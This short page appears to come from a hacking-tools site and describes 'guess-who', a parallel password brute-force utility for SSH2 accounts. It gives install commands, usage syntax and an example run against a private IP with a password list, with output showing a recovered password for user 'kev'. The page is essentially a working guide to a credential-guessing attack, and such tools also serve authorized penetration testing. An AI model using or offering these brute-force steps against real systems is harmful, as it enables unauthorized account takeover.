Guess Who
Guess-who is a password brute force utility for attacking Secure Shell
Version 2 accounts.
It is available from
here.
Installation:
Download to the desired directory
tar -zxvf guess-who-0.44.tgz
make
Execution:
[root@hacker guess-who]# ./b
guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer@cs.uni-potsdam.de
Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n
ntries]
Use -1 for producer/consumer thread model, -2 for dumb parallelism. <
Password file
Expected output:
[root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt
(!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ]
[ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ]
As you can see the user kev has a password of arsenal
|